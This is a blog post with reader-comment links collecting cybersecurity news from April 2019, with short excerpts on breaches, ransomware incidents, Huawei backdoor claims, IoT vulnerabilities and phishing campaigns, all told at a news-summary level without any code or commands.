This posting is here to collect cyber security news in April 2019.
I post links to security vulnerability news to comments of this article.
If you are interested in cyber security trends, read my Cyber security trends 2019 posting.
You are also free to post related links.
402 Comments
Tomi Engdahl says:
Fooling Automated Surveillance Cameras with Patchwork Color Printout
https://www.schneier.com/blog/archives/2019/04/fooling_automat.html
Tomi Engdahl says:
New DNS Hijacking Attacks
https://www.schneier.com/blog/archives/2019/04/new_dns_hijacki.html
DNS hijacking isn’t new, but this seems to be an attack of unprecedented scale
Tomi Engdahl says:
Source: Hacker holding Cleveland Hopkins International Airport systems hostage demands ransom via Bitcoin
http://www.cleveland19.com/2019/04/25/source-hacker-holding-cleveland-hopkins-international-airport-systems-hostage-demands-ransom-via-bitcoin/
Tomi Engdahl says:
Mary Madden / New York Times:
When low-income people fall victim to an online fraud or a data breach, the cascade of repercussions, both online and offline, can be devastating
http://www.nytimes.com/2019/04/25/opinion/privacy-poverty.html
Tomi Engdahl says:
Docker Hub Hacked – 190k accounts, GitHub tokens revoked, Builds disabled
https://news.ycombinator.com/item?id=19763413
During a brief period of unauthorized access to a Docker Hub database, sensitive data from approximately 190,000 accounts may have been exposed (less than 5% of Hub users). Data includes usernames and hashed passwords for a small percentage of these users, as well as Github and Bitbucket tokens for Docker autobuilds.
Tomi Engdahl says:
Man accused of using flash drives to steal money from multiple businesses
https://www.local10.com/news/florida/miami-dade/man-accused-of-using-flash-drives-to-steal-money-from-multiple-businesses
A man is facing multiple charges after he used flash drives to steal money from multiple businesses in Miami-Dade County, authorities said.
asked for printing services for an airline itinerary and handed the clerk a USB drive, which the clerk placed into a computer.
he left the business after paying a fee for the services.
Two days later, the manager noticed the computer screen had turned blue and the cursor on the screen was moving on its own, as though someone had gained unauthorized remote access.
Tomi Engdahl says:
‘Facebook is spying on me’: User gets ads for obscure things she’s just chatted about
https://www.mirror.co.uk/news/uk-news/facebook-isnt-spying-us-ads-12362519
Tyler Mears has been left baffled after two obscure products she had chatted about out loud randomly appeared as a targeted advert on her Facebook the next day
Tomi Engdahl says:
Microsoft Discovers Huawei Driver Allowing Backdoor Hack Into Laptops
https://www.zerohedge.com/news/2019-04-23/microsoft-discovers-huawei-driver-allowing-backdoor-hack-laptops
Tomi Engdahl says:
Security service monitor rejects bulk hack request involving millions of names
https://www.dutchnews.nl/news/2019/04/security-service-monitor-rejects-bulk-hack-request-involving-millions-of-names/
Tomi Engdahl says:
Hacked Lime scooters play offensive voice messages
https://www.brisbanetimes.com.au/national/queensland/hacked-lime-scooters-play-offensive-voice-messages-20190423-p51ghx.html
Tomi Engdahl says:
Andy Greenberg / Wired:
While many foreign phone carriers are sharing real-time SIM swap data with banks to stop financial fraud, US carriers are dragging their feet
http://www.wired.com/story/sim-swap-fix-carriers-banks
Tomi Engdahl says:
Mara Hvistendahl / Wired:
Inside the criminal investigation of an IT support technician who ordered his wife’s murder on a dark web site, which was a scam, and then killed her himself
http://www.wired.com/story/dark-web-bitcoin-murder-cottage-grove
Tomi Engdahl says:
New York Times:
Officials say FBI, DHS, NSA, and the US Cyber Command task forces, formed before midterms to combat foreign interference in elections, have been made permanent — WASHINGTON — The F.B.I. director warned anew on Friday about Russia’s continued meddling in American elections, calling it a “significant counterintelligence threat.”
https://www.nytimes.com/2019/04/26/us/politics/fbi-russian-election-interference.html
Tomi Engdahl says:
How to combat the threat of Android malware
Many antivirus apps are bad, but there are solutions.
https://www.popsci.com/android-malware-tips
Android malware is real, but the risk is higher outside the U.S.
The risk of malware on the Android operating system “depends on many different factors,” says Andreas Clementi, CEO of AV-Comparatives.
“Official stores such as Google Play are mostly used in western countries, where the risk of infection is very low,’ Clementi says. “In Asian countries, where rooted devices and large number of third-party app stores can be found, the chance of installing a dangerous app is greatly increased.”
Furthermore, Android malware is different from Windows malware, and that leads to confusion when all you see are scary statistics.
“Numbers propagated in the media might be inflated, depending on how threats are defined,” Clementi says. “Some people define Adware and other potentially unwanted apps as threats. If those are counted as such, the numbers look very high, as there are a lot of potentially unwanted apps on Android.”
Most (but not all) Android antivirus apps are terrible
This spring, AV-Comparatives tested 250 antivirus apps, finding only 80 that detected a significant amount of malicious samples.
Tomi Engdahl says:
GitHub-Hosted Magecart Card Skimmer Found on Hundreds of Stores
https://www.bleepingcomputer.com/news/security/github-hosted-magecart-card-skimmer-found-on-hundreds-of-stores/
Tomi Engdahl says:
BEC fraud losses almost doubled last year
https://www.welivesecurity.com/2019/04/25/bec-fraud-losses-doubled-2018/
On the good news front, the FBI notes the success of its newly-established team in recovering some of the funds lost in BEC scams
Tomi Engdahl says:
Threat actors abuse GitHub service to host a variety of phishing kits
https://www.proofpoint.com/us/threat-insight/post/threat-actors-abuse-github-service-host-variety-phishing-kits
Editor’s Note:
As of Friday, April 19, GitHub had taken down all accounts hosting phishing material listed in this blog. GitHub has been extremely responsive in addressing this abuse of their systems.
Overview
As Proofpoint researchers have observed in the past, phishers and other threat actors are able to bypass whitelists and network defenses due to their widespread use of large consumer cloud storage sites, social networking, and commerce services such as Dropbox, Google Drive, Paypal, Ebay, and Facebook.
Since at least mid-2017, phishers have also been abusing free code repositories on the popular GitHub service to host phishing websites on the canonical $github_username.github.io domain.
Tomi Engdahl says:
TA505 Spear Phishing Campaign Uses LOLBins to Avoid Detection
https://www.bleepingcomputer.com/news/security/ta505-spear-phishing-campaign-uses-lolbins-to-avoid-detection/
Tomi Engdahl says:
CARBANAK Week Part Three: Behind the CARBANAK Backdoor
https://www.fireeye.com/blog/threat-research/2019/04/carbanak-week-part-three-behind-the-backdoor.html
CARBANAK Week Part Four: The CARBANAK Desktop Video Player
https://www.fireeye.com/blog/threat-research/2019/04/carbanak-week-part-four-desktop-video-player.html
Tomi Engdahl says:
AESDDoS Botnet Targets Vulnerability in Atlassian’s Confluence Server
https://www.securityweek.com/aesddos-botnet-targets-vulnerability-atlassian%E2%80%99s-confluence-server
Tomi Engdahl says:
P2P Flaws Expose Millions of IoT Devices to Remote Attacks
https://www.securityweek.com/p2p-flaws-expose-millions-iot-devices-remote-attacks
Vulnerabilities discovered by a researcher in a peer-to-peer (P2P) system named iLnkP2P expose millions of cameras and other Internet of Things (IoT) devices to remote attacks from the Internet, and no patches are available.
Paul Marrapese, a California-based security engineer, discovered two serious flaws in iLnkP2P, a system developed by Chinese firm Shenzhen Yunni Technology Company, Inc. iLnkP2P is a P2P solution that makes it easier for users to connect to their IoT devices from their phone or computer.
According to the expert, iLnkP2P is present in devices marketed under hundreds of brands, including Hichip, TENVIS, SV3C, VStarcam, Wanscam, NEO Coolcam, Sricam, Eye Sight, and HVCAM. Affected products include cameras, baby monitors and smart doorbells. Marrapese has conducted an Internet scan and identified over 2 million vulnerable devices.
Tomi Engdahl says:
Google to Block Logins From Embedded Browsers to Prevent Phishing
https://www.securityweek.com/google-block-logins-embedded-browsers-prevent-phishing
Google on Thursday announced that it will soon block login attempts from embedded browser frameworks in an effort to prevent man-in-the-middle (MitM) phishing attacks.
The tech giant says phishing attacks that involve traffic interception are difficult to detect when an embedded browser framework or a different type of automation platform is used for authentication.
As an example of an embedded browser framework Google provided its Chromium Embedded Framework (CEF), which is designed for embedding Chromium-based browsers in other applications.
Tomi Engdahl says:
Source Code of Iran-Linked Hacking Tools Posted Online
https://www.securityweek.com/source-code-iran-linked-hacking-tools-posted-online
The data, posted online by a group of alleged Iranian hackers called “Lab Dookhtegan,” is supposedly related to the infamous OilRig hackers. Also known as APT34 and active since at least 2014, the OilRig group is believed to be backed by the Iranian government.
Tomi Engdahl says:
WannaCry ‘Hero’ Marcus Hutchins Pleads Guilty to Creating Malware
https://www.securityweek.com/wannacry-hero-marcus-hutchins-pleads-guilty-creating-malware
Tomi Engdahl says:
Operator of Codeshop Cybercrime Marketplace Sentenced to Prison
https://www.securityweek.com/operator-codeshop-cybercrime-marketplace-sentenced-prison
Known online as “codeshop,” “xhevo,” “sindrom” and “sindromx,” Ametovski ran Codeshop, a website that offered stolen payment card data, bank account credentials, and personal information.
Tomi Engdahl says:
Hacker Group Exposes Iranian APT Operations and Members
https://www.bleepingcomputer.com/news/security/hacker-group-exposes-iranian-apt-operations-and-members/
Hackers have revealed details about the inner workings of a cyber-espionage group mostly known in the security community as OilRig, APT34, and HelixKitten, linked to the Iranian government.
Using the online name Lab Dookhtegan, the hackers used a Telegram channel to dump information about APT34′s infrastructure, hacking tools, members, and victims.
Tomi Engdahl says:
Europeans Hit with Multi-Stage Malware Loader via Signed Malspam
https://www.bleepingcomputer.com/news/security/europeans-hit-with-multi-stage-malware-loader-via-signed-malspam/
Tomi Engdahl says:
RevengeRAT Distributed via Bit.ly, BlogSpot, and Pastebin C2 Infrastructure
https://www.bleepingcomputer.com/news/security/revengerat-distributed-via-bitly-blogspot-and-pastebin-c2-infrastructure/
A malicious campaign targeting entities from North America, Europe, Asia, and the Middle East during March used a combination of pages hosted on Bit.ly, BlogSpot, and Pastebin to create a command-and-control (C2) infrastructure designed to avoid getting blocked by security solutions.
Tomi Engdahl says:
Apr 19
Wipro Intruders Targeted Other Major IT Firms
https://krebsonsecurity.com/2019/04/wipro-intruders-targeted-other-major-it-firms/
Tomi Engdahl says:
Microsoft loses control over Windows Tiles
https://www.golem.de/news/subdomain-takeover-microsoft-loses-control-over-windows-tiles-1904-140717.html
A service from Microsoft used to allow web page owners to deliver news on Windows Tiles as so-called Windows Live Tiles. After the service has been disabled, we were able to take over the corresponding subdomain and display our own Tile contents.
Tomi Engdahl says:
Hacker Breaks Into French Government’s New Secure Messaging App
https://thehackernews.com/2019/04/france-Tchap-secure-messenger.html
Tomi Engdahl says:
Zero-day XML External Entity (XXE) Injection Vulnerability in Internet Explorer Can Let Attackers Steal Files, System Info
https://blog.trendmicro.com/trendlabs-security-intelligence/zero-day-xml-external-entity-xxe-injection-vulnerability-in-internet-explorer-can-let-attackers-steal-files-system-info/
Tomi Engdahl says:
Mozilla Firefox to Enable Hyperlink Ping Tracking By Default
https://www.bleepingcomputer.com/news/software/mozilla-firefox-to-enable-hyperlink-ping-tracking-by-default/
For those not familiar with hyperlink auditing, it is a HTML feature that allows web sites to track link clicks by adding the “ping=” attribute to HTML links. When these links are clicked, in addition to navigating to the linked to page, the browser will also connect to the page listed in the ping= attribute, which can then be used to record the click.
Ping HTML Link
When these links are displayed on the page, they will appear as a normal link and if a user clicks on it, there is no indication that a connection is being made to a different page as well.
Privacy risk?
Earlier this month, we covered how Google Chrome, Opera, Microsoft Edge, and Safari enabled hyperlink auditing pings by default. While some browsers currently enable you to disable this feature, all of the mentioned browsers will no longer allow users to do so in the future.
Tomi Engdahl says:
‘WannaCry Hero’ Marcus Hutchins Pleads Guilty to Making Banking Malware
https://motherboard.vice.com/en_us/article/qv7pad/marcus-hutchins-pleads-guilty-banking-malware-wannacry-hero
The researcher who helped stop the WannaCry ransomware pleaded guilty to two counts of hacking for writing banking malware in 2014.
Tomi Engdahl says:
Ransomware attack knocks Weather Channel off the Air
https://securityaffairs.co/wordpress/84164/hacking/weather-channel-ransomware-attack.html
A ransomware attack knocked the Weather Channel off the air for at least 90 minutes Thursday morning, federal law enforcement are investigating the incident.
Tomi Engdahl says:
Tech Support Scam Employs New Trick by Using Iframe to Freeze Browsers
https://blog.trendmicro.com/trendlabs-security-intelligence/tech-support-scam-employs-new-trick-by-using-iframe-to-freeze-browsers/
We discovered a new technical support scam (TSS) campaign that makes use of iframe in combination with basic pop-up authentication to freeze a user’s browser. Since this technique is new and unfamiliar, it can potentially evade detection. Like many TSS campaigns, it disguises itself as a legitimate or well-known brand’s service provider to lure its victims. This campaign in particular uses Microsoft.
Tomi Engdahl says:
Naming and shaming nations that launch cyberattacks does work, say intel chiefs
https://www.zdnet.com/article/naming-and-shaming-nations-that-launch-cyberattacks-does-work-say-intel-chiefs/
Cybersecurity agencies explain when and why they attribute cyberattacks to other nations.
Tomi Engdahl says:
Confidence in the internet is wobbling: Here’s how to fix it, says cyber chief
https://www.zdnet.com/article/confidence-the-internet-is-wobbling-heres-how-to-fix-it-says-cyber-chief/
Tech industry has a responsibility to fix security for the next generation, says NCSC head.
There’s been a dip in confidence around how the internet works and it’s up to the cybersecurity industry and others to help fix problems and ensure that we don’t make the same mistakes that were being made when online connectivity was a new phenomenon as fresh internet-connected technologies emerge.
“These new generations of technologies still offer unparalleled opportunities to make all our lives so much better – our healthcare, our economy, our societies, but we have to think about managing the risks and the harm,” said Ciaran Martin, CEO of the National Cyber Security Centre (NCSC), the cybersecurity arm of the UK’s GCHQ intelligence agency.
Tomi Engdahl says:
Powershell, the Gandcrab infection and the long-forgotten server
GCHQ offshoot shares infosec hair-raisers
https://www.theregister.co.uk/2019/04/29/surprising_infosec_stories_from_ncsc/
CyberUK 2019 If your hair isn’t already grey enough, GCHQ staff have revealed a handful of infosec incidents that, in their words, “surprised us”.
The NCSC is part of GCHQ’s drive since 2013 to rebuild public trust and convince industry that the government is also interested in their economic wellbeing. As part of that, NCSC occasionally gets called in to help with particularly pernickety problems involving malware infections on corporate networks.
A look over the company’s logs revealed that Gandcrab had been introduced via a download from Pastebin – an encoded Base64 binary summoned through a Powershell command, no less.
CVE-2017-18362 explained half the story. The critical vuln allows anyone with access to the Kaseya server’s ManagedIT.asmx page through its web interface to execute arbitrary SQL queries. As Toby put it: “No whitelisting, no blacklisting, no password entry… send SQL commands and HTTP POST and it’ll just run it.”
But Powershell? Easy if you know about CVE-2018-20753, which allows (yup, you guessed it) unprivileged remote attackers to execute Powershell payloads on all managed devices.
Tomi Engdahl says:
Russia’s great firewall: is it meant to keep information in – or out?
https://www.theguardian.com/technology/2019/apr/28/russia-great-firewall-sovereign-internet-bill-keeping-information-in-or-out
Vladimir Putin will soon sign the ‘sovereign internet’ bill to allow greater monitoring of traffic. But what are its other consequences?
Tomi Engdahl says:
Norsk Hydro Says Cyber Attack Cost It Around $50 Mln
https://www.securityweek.com/norsk-hydro-says-cyber-attack-cost-it-around-50-mln
Global aluminium producer Norsk Hydro on Tuesday put the cost of a cyber attack targeting the Norwegian company in March at around $50 million.
In the night between March 18 and 19, the company became the target of a “massive” cyber attack involving ransom ware, forcing it to disconnect from various sites and factories and switch to manual operations in others.
The attack also forced it to postpone the publication of its quarterly earnings, originally scheduled for Tuesday, to June 5.
Tomi Engdahl says:
ImmuniWeb Launches Free Testing Tool for Website Security and PCI Compliance
https://www.securityweek.com/immuniweb-launches-free-testing-tool-website-security-and-pci-compliance
Swiss-based web security company ImmuniWeb, known until recently as High-Tech Bridge, on Monday announced the availability of a free tool designed for testing websites.
The new Website Security Test tool checks sites for PCI DSS compliance (6.2, 6.5 and 6.6 requirements), it analyzes the content management system (CMS), checks the web server and content security policy (CSP), and looks for privacy issues.
Specifically, the tool checks if a web application firewall (WAF) is present, if the CMS and its components are up-to-date, if the JavaScript components are up-to-date, if cookies are properly configured, if web server directory listing is enabled, and if cryptojacking malware is detected.
https://www.immuniweb.com/websec/
Tomi Engdahl says:
Facebook to Fund Research on Social Media Impact on Elections
https://www.securityweek.com/facebook-fund-research-social-media-impact-elections
Facebook announced Monday its first research grants to academics studying the impact of social media on elections, part of an effort to prevent manipulation of social platforms.
The leading social network said some 60 researchers from 30 academic institutions across 11 countries were selected under a review process by the Social Science Research Council and the independent group Social Science One.
Tomi Engdahl says:
GDPR Conformance Does Not Excuse Companies from Vicarious Liability
https://www.securityweek.com/gdpr-conformance-does-not-excuse-companies-vicarious-liability
The UK supermarket chain Morrisons’ legal battle with 5,500 of its own employees over vicarious liability introduces a new threat element to the already complex and confusing demands of the EU’s General Data Protection Regulation (GDPR).
Tomi Engdahl says:
Backdoors in Huawei Equipment Discovered by Vodafone Italy in 2009
https://gizmodo.com/backdoors-in-huawei-equipment-discovered-by-vodaphone-i-1834408368?utm_campaign=socialflow_gizmodo_facebook&utm_source=gizmodo_facebook&utm_medium=socialflow
Vodafone Italy discovered backdoors in its Huawei home internet routers and software between 2009 and 2011 according to a new report from Bloomberg News. The backdoors have reportedly been fixed, but the revelations are still bad news for Huawei as the Chinese tech giant tries to secure contracts to build 5G infrastructure around the world.
Tomi Engdahl says:
Editors’ picks for 2018: ‘The African Union headquarters hack and Australia’s 5G network
https://www.aspistrategist.org.au/editors-picks-for-2018-the-african-union-headquarters-hack-and-australias-5g-network/
Tomi Engdahl says:
‘One Ring’ Wireless Phone Scam
https://www.fcc.gov/consumers/guides/one-ring-wireless-phone-scam
If your phone rings once and then stops, think twice before returning the call. It may be a scam
Why Phone Fraud Starts With A Silent Call
https://www.npr.org/sections/alltechconsidered/2015/08/24/434313813/why-phone-fraud-starts-with-a-silent-call?t=1556689827658
Tomi Engdahl says:
Oh dear. Secret Huawei enterprise router snoop ‘backdoor’ was Telnet service, sighs Vodafone
We all want to see hard proof of deliberate espionage. This is absolutely not it
https://www.theregister.co.uk/2019/04/30/huawei_enterprise_router_backdoor_is_telnet/
Tomi Engdahl says:
Hackers Steal and Ransom Financial Data Related to Some of the World’s Largest Companies
https://motherboard.vice.com/en_us/article/d3np4y/hackers-steal-ransom-citycomp-airbus-volkswagen-oracle-valuable-companies
The data was stolen from Citycomp, which provides internet infrastructure for dozens of companies including Oracle, Airbus, Toshiba, and Volkswagen.
Tomi Engdahl says:
Uncovering CVE-2019-0232: A Remote Code Execution Vulnerability in Apache Tomcat
https://blog.trendmicro.com/trendlabs-security-intelligence/uncovering-cve-2019-0232-a-remote-code-execution-vulnerability-in-apache-tomcat/